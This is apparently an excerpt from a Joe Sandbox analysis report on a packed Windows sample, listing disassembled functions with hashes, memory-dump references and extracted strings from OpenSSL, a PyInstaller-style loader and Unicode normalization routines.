                                                                                                                                                                                                                            • Instruction ID: 10931e9ea5c8dfcea36702219b941d515407cecb8305b333bf371b7c80361ffd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6e32d2a87c9bf4bffe58590dd5cd680f2edfc48ac6da9441f9a64b9abbbd7b3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5311911B0D64245FB18A762A931FF95791AF85B88F880230EE3DC7BCEEE6CE4019701
                                                                                                                                                                                                                            Function 00007FFDFF279E00 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 295COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$D_get_sizeR_set_debugY_get_size
                                                                                                                                                                                                                            • String ID: ..\s\ssl\t1_lib.c$gfffffff$gfffffff$gfffffff$tls_choose_sigalg
                                                                                                                                                                                                                            • API String ID: 2573607796-412855087
                                                                                                                                                                                                                            • Opcode ID: efda8357b2d78a961678926b5314214b849d1ef492eacf8a5afd6d0d05f90368
                                                                                                                                                                                                                            • Instruction ID: 86c74956f4af861392053e43611699dc73a2064b24f8f4c5282c9704e397a41c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efda8357b2d78a961678926b5314214b849d1ef492eacf8a5afd6d0d05f90368
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EEC1C122B0964686FB299A16B560BB92390FB41BA4F444335DEBDC37D9DF3CF4528B01
                                                                                                                                                                                                                            Function 00007FFDFF241D70 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 96COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa_legacy.c$SSL_CTX_use_RSAPrivateKey_file
                                                                                                                                                                                                                            • API String ID: 1899708915-485430192
                                                                                                                                                                                                                            • Opcode ID: 07a72aae6da836964353982f9d2eaf7990691f61a0b9cd275f5e418e98ac502b
                                                                                                                                                                                                                            • Instruction ID: d8b3a1c97114b9b719448c950ae8f7660ed92b2195bd235cb8fc074350870f2e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07a72aae6da836964353982f9d2eaf7990691f61a0b9cd275f5e418e98ac502b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71314710F0DA4245F718B7629871AB99341AF85B80F984231EE7DDBBDFEE2CE9014B41
                                                                                                                                                                                                                            Function 00007FFDFF241B81 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DigestSign$Update$D_get_sizeFinalM_construct_endM_construct_size_tR_get_modeX_ctrlX_freeX_get0_cipherX_get0_mdX_get_pkey_ctxX_newX_set_params
                                                                                                                                                                                                                            • String ID: tls-data-size
                                                                                                                                                                                                                            • API String ID: 2598929643-2895545602
                                                                                                                                                                                                                            • Opcode ID: 604ea0b7ea68f8b8ed54789427987f97e76905353a4b6ead4ed8160d8c092d38
                                                                                                                                                                                                                            • Instruction ID: 1a9aacf6eb2d61f5193f9d7df072eb1014e794e1a01454dae15e18de27aed687
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 604ea0b7ea68f8b8ed54789427987f97e76905353a4b6ead4ed8160d8c092d38
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5681D522B0868289E715DB69C4207FD27A0FB55B88F448632EE6DD77DADF38E545C340
                                                                                                                                                                                                                            Function 00007FFDFF2A2DF0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$set_client_ciphersuite
                                                                                                                                                                                                                            • API String ID: 193678381-554836899
                                                                                                                                                                                                                            • Opcode ID: e9c01c2ec99fba761335fa45ce2f792bd35c244c6f8d64c1c3fb51e81e00e092
                                                                                                                                                                                                                            • Instruction ID: ab9ed4ce4d4222c445c14de7f4a5a344caf34d29e1041fdb56b08ace5ef8eaa7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9c01c2ec99fba761335fa45ce2f792bd35c244c6f8d64c1c3fb51e81e00e092
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49716021B1964286EB44DB65E461FF96350EF84B84F881231DA3DCBBDEDF6DE5818B00
                                                                                                                                                                                                                            Function 00007FFDFF241C62 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$L_sk_valueR_clear_errorX509_get0_pubkey
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_clnt.c$tls_post_process_server_certificate
                                                                                                                                                                                                                            • API String ID: 2779586248-3767186838
                                                                                                                                                                                                                            • Opcode ID: 48797babb5d163d455a82be5dd0cc4f947859bab48715f24bbded004c028dc82
                                                                                                                                                                                                                            • Instruction ID: 4ed019183cb11ad65d7b4899778e592cc0e5eba9d33564b849015cfcc12a8af2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48797babb5d163d455a82be5dd0cc4f947859bab48715f24bbded004c028dc82
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA518B62B0968285F7149B25D461BBD2760FB84B84F884231DE3DCB7DEDF2DE9818700
                                                                                                                                                                                                                            Function 00007FF6029915C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                            • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                            • Opcode ID: c14727812476fb5ff1224723f0c795bc4a83dc14f99977d12763566881ca2c6d
                                                                                                                                                                                                                            • Instruction ID: 6407cc18d1fd11d8f2945dbc832357982262034f8f189bcc131f36ec77d768ee
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c14727812476fb5ff1224723f0c795bc4a83dc14f99977d12763566881ca2c6d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3151F061F086439AEA109B1BE9001B96B60FF44BACF644031EE0CC7B97EFBDE1658340
                                                                                                                                                                                                                            Function 00007FF602997720 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF602998410: MultiByteToWideChar.KERNEL32(?,?,?,00007FF602993F84,00000000,00007FF602991925), ref: 00007FF602998449
                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00007FF602997BE7,?,?,FFFFFFFF,00007FF602993834), ref: 00007FF60299777C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029926C0: MessageBoxW.USER32 ref: 00007FF602992736
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                            • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                            • API String ID: 1662231829-930877121
                                                                                                                                                                                                                            • Opcode ID: 0b19b84abd9dc7bd15dd8fb1d6717de249e9de78f914ec8fa30428a76574ce1d
                                                                                                                                                                                                                            • Instruction ID: 7a6eccc6ea2f4effa9055b7710104c6697e653f69879bd049790bb8444196a5d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b19b84abd9dc7bd15dd8fb1d6717de249e9de78f914ec8fa30428a76574ce1d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E241D351E2C6439AFB51EB6BD9512FA6B50EF8479CF644032DA0EC2697EEECE514C300
                                                                                                                                                                                                                            Function 00007FFDFF27BF30 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 84COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_puts$O_indentO_printfX509X509_freed2i_
                                                                                                                                                                                                                            • String ID: ------details-----$------------------$<TRAILING GARBAGE AFTER CERTIFICATE>$<UNPARSEABLE CERTIFICATE>$ASN.1Cert, length=%d
                                                                                                                                                                                                                            • API String ID: 4063798575-1858050172
                                                                                                                                                                                                                            • Opcode ID: dd2dcce25f7c55954b11d69bf053fed3903d5ef40774a48cf075c50a2528422e
                                                                                                                                                                                                                            • Instruction ID: 32bef76f6b5b88dbcbc9e55d2b2c99c25dd30795e1c05887bb1bd1f584ed9d5c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd2dcce25f7c55954b11d69bf053fed3903d5ef40774a48cf075c50a2528422e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2831A42270D69149DB14EB26A864ABD6761EB45BD0F844231EE7DC7BCEEFACE1018700
                                                                                                                                                                                                                            Function 00007FFDFF26ADB0 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 82COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa.c$SSL_use_certificate$ssl_set_cert
                                                                                                                                                                                                                            • API String ID: 1552677711-2944039091
                                                                                                                                                                                                                            • Opcode ID: 26d539224d6ffea8874f20852713715164ed6db8eeb8801a3fe6ea007f1f9233
                                                                                                                                                                                                                            • Instruction ID: 1e71b8f33e8326b965e8276f7e40d184b0120c9a6ad9bb549740ef6bd3a6c0a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26d539224d6ffea8874f20852713715164ed6db8eeb8801a3fe6ea007f1f9233
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B317421B1968146E744A725E821AE99361EF897C4F984231EF7CD7BDFEE2CE9404B00
                                                                                                                                                                                                                            Function 00007FFDFF29ECC0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 207COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem.c$read_state_machine
                                                                                                                                                                                                                            • API String ID: 0-3323778802
                                                                                                                                                                                                                            • Opcode ID: 22c6f41a49bc2efe7502410bcd7e4adc53d9fd67355b2da848528a5b53e9851c
                                                                                                                                                                                                                            • Instruction ID: 6d26080a1f11058fbc9e865ea62947974f30786175a87ba42fa9f951c6d3585e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22c6f41a49bc2efe7502410bcd7e4adc53d9fd67355b2da848528a5b53e9851c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9919A32B08A4285EB609B25D4A0BBD2390EF81B48F584236CA3DC76DEDF7DE546D750
                                                                                                                                                                                                                            Function 00007FFDFABD4910 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 93COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CompareUnicode_$DeallocStringWith
                                                                                                                                                                                                                            • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                            • API String ID: 1004266020-3528878251
                                                                                                                                                                                                                            • Opcode ID: f9f7669bc8d988216f82ec34d7818f873f2375af147d85eaf967d2e1963bb846
                                                                                                                                                                                                                            • Instruction ID: 6f46d7c518d5e7c70f6f6617b21039c5977a957f3b5a775827d5a0cb94a1aa2b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9f7669bc8d988216f82ec34d7818f873f2375af147d85eaf967d2e1963bb846
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01319C25B0CA4395EB0C8B12E874B3963A5AF49B94FC441B9CC6E4B7D8EF3CE044A300
                                                                                                                                                                                                                            Function 00007FFDFF268E70 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
